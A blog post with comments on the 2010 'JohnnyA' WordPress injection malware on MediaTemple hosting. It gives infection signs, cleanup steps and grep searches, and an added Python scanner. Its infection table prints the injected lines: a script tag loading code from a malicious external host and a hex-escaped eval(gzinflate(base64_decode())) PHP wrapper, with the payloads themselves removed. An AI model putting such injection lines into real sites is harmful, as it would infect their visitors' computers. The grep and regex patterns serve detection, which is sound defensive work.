We’ll use this page to collect all information about the WordPress injection exploit, malware that is infecting MediaTemple servers (and possibly other hosts as well; please let us know if you are on another host).
MediaTemple claims this is an “application-level” exploit (e.g. WordPress, Drupal, or another app). However, all domains on our grid server account have been compromised, while none (0) of the domains on our dedicated virtual accounts have been compromised. We believe it to be both a WordPress 2.9 vulnerability and a vulnerability in MediaTemple’s Grid Server accounts. We believe the virus is crawling the entire grid server, looking for “scripts” directories, injecting code into JavaScript files, and creating PHP files.
More on the MediaTemple WordPress Grid-Server Exploit
You Are Infected When
- You have new admin users in your WordPress control panel whom you did not create (e.g. “JohnnyA”, “JohnnyB” or “amin”)
- Extra code has been inserted at the head of the JavaScript files in your “scripts” directory (e.g. jquery-min.js)
- You get a virus alert message when visiting your website.
Description
From what we can tell, the virus exploits an older version of WordPress (prior to 3.01) and injects code into JavaScript files, PHP files, and even WordPress posts, which then download viruses to the visitor’s computer. These viruses have been known to seriously damage users’ computers.
Protecting Yourself
The good news is – if you are running an updated virus protection suite (including AVG or Avast (both free)), it will block the virus. If you are not, please – update or install virus protection asap.
Also, if you are not running the latest version of WordPress, we will need to upgrade it soon. The latest version of WordPress addresses and fixes this exploit.
Infections Found
| File/Location | Injection |
|---|---|
| Topmost Post | `<h5><script src="http://silver.smartenergymodel.com/js/jquery.min.js"></script></h5>` |
| /theme/index.php | `<?php $o = '[payload removed]';eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B"); ?>` |
| (theme)/js/Museo.font.js | `var st1 = 0;document.write(unescape('[percent-encoded payload removed]'));var gr0=0;` |
| scripts/global.js | `var st1 = 0;` [obfuscated self-decoding function and hex-encoded payload removed] `var gr0=0;` |
More Information
We will continue to post more information as it comes in.
08/05/2010
Hi there,
Someone sent me this link via Twitter. I’m using WP via Media Temple and woke up this morning to having my site blocked due to Malware. I’ve been given so many different instructions about what the issue could possibly be. First, I was told there was malware in a dropdowns.js within my theme. I deleted what I was told to by Media Temple, and uploaded a fresh one. [I've used this theme without incident for almost a year.]
Earlier today while hunting for solutions on my own [which is overwhelming when you have no clue what you're doing or looking for], I read up about “johnnyA” & was able to finally access my WP admin panel using Safari. [other browsers blocked my site] I did see an admin “johnnyA” and I deleted it and all links & posts associated with it as well.
Unfortunately, Media Temple didn’t feel this issue had anything to do with them and my support ticket with them only gave me a million different complex steps/thoughts/ideas – none of which have helped me. Equally unfortunate, Safari was apparently the only browser that would bypass the block and allow me to access my WP admin panel, and now that is blocked as well.
After taking to Twitter and publicly going nuts over this and getting tons of replies from others with the same situation, someone from Media Temple called me. He asked me to explain a timeline and I did. Again. [this was all in my support ticket] He made a comment about seeing what could be done and would call me back in an hour. That was almost 4 hours ago. I still do not have access to my site, Google still flags it, and I’m basically in limbo as I can’t access my WP admin panel at all. Messing around with databases would be a mess if I took it on myself.
The main reason I am commenting is this:
You mention the latest version of WP correcting the matter, and that isn’t accurate. I successfully upgraded automatically on 8/5/10, my site was running fine last night, and this problem began today, 8/6/10.
The funny thing is that I run WP on another domain and it’s fine. The only difference between the two is that the affected site [the one that is blocked] has WP running VIA Media Temple. The 2nd unaffected blog has WP that I installed on my own.
Am I completely in error in suspecting that this most definitely is a connection between the malware + MT + WP via MT? Or is that just a coincidence?
Sherri,
It sounds like you’ve got a fun infection on your hands. Let me try to answer everything as succinctly and directly as possible:
As to the source, I’ll just say I think MediaTemple should take more ownership than they are.
To clean the virus, you will need to do several things (in addition to upgrading WordPress), as it now currently resides on your server. If these things are too difficult for you (e.g. editing the database), you’ll need to call someone who can help you. It isn’t too hard, but I’d be careful when editing the database directly.
1. Get some background on the JohnnyA virus here
2. Remove extra unused directories on your server
3. Change all passwords (database passwords, wordpress passwords, etc)
4. Remove fake admin users (e.g. JohnnyA, JohnnyB, amin)
5. Change WordPress Secret Keys
6. Clean Viruses by searching your entire domain for the following strings (more info on how to search for the virus using grep):
   1. document.write of all .js files: `grep -R "document.write(unescape" *`
   2. string longer than 255 chars in .php files: `grep -iR --include "*.php" "[a-zA-Z0-9\/\+]\{255,\}" *`
   3. string longer than 255 chars in .js files: `grep -iR --include "*.js" "[a-zA-Z0-9\/\+]\{255,\}" *`
   4. Nasty eval: `grep -R "eval(gzinflate(base64_decode(" *`
7. Search your database for “<script ” injected into any posts
8. UPGRADE WORDPRESS TO LATEST VERSION (backup everything first)
9. Once cleaned (be sure everything is cleaned) – You’ll need to submit your site for review within Google Webmaster Tools
Using these steps I was able to remove a site within a few days from the Google Safe-browsing List.
Let us know if this helps you and/or if you need further clarification.
Kind regards,
Tison
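The grep for `eval(gzinflate(base64_decode(` in step 6 does not match the /theme/index.php injection listed in the table above, because that copy hides the call behind `\x` escapes. The following is an added example, not part of the original post or its comments: it decodes `\xNN` and `%NN` sequences before applying the same three patterns. The signature names, function names and sample strings are constructed for illustration.

```python
import os
import re
import sys
from urllib.parse import unquote

# Signatures mirror the grep patterns in the cleanup steps above.
SIGNATURES = {
    "eval-gzinflate": re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I),
    "document.write-unescape": re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
    "long-encoded-run": re.compile(r"[A-Za-z0-9/+]{255,}"),
}
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")

def normalize(text):
    """Undo \\xNN string escapes and %NN encoding so hidden calls become visible."""
    text = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text)

def scan_text(text):
    """Return the sorted signature names found in the raw or the decoded text."""
    views = (text, normalize(text))
    return sorted(n for n, rx in SIGNATURES.items() if any(rx.search(v) for v in views))

def scan_tree(root, exts=(".php", ".js")):
    """Map every .php/.js file under root that triggers a signature to its hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed samples: wrappers only, with no real payload inside.
SAMPLES = {
    "plain.php": "<?php eval(gzinflate(base64_decode($o))); ?>",
    "hexed.php": r'<?php eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65'
                 r'\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B"); ?>',
    "writer.js": "document.write(unescape('%3Cscript%3E%3C/script%3E'));",
    "blob.js": "run('" + "9e" * 200 + "');",
    "clean.js": "function add(a, b) { return a + b; }",
}

if __name__ == "__main__":
    found = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else {n: scan_text(b) for n, b in SAMPLES.items()}
    for path, hits in sorted(found.items()):
        print(path, ", ".join(hits) or "clean")
```

Run it with a directory argument to scan a site's files; a hit is a lead for manual review, since minified libraries can also trip the long-run rule.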
1) You’ll need to change
[...] the attacks. The one I just dealt with on this blog (and 23 of my own and client blogs) was called JohnnyA. It inserted a Javascript that re-directed my site to a spam site and then spread PHP files through [...]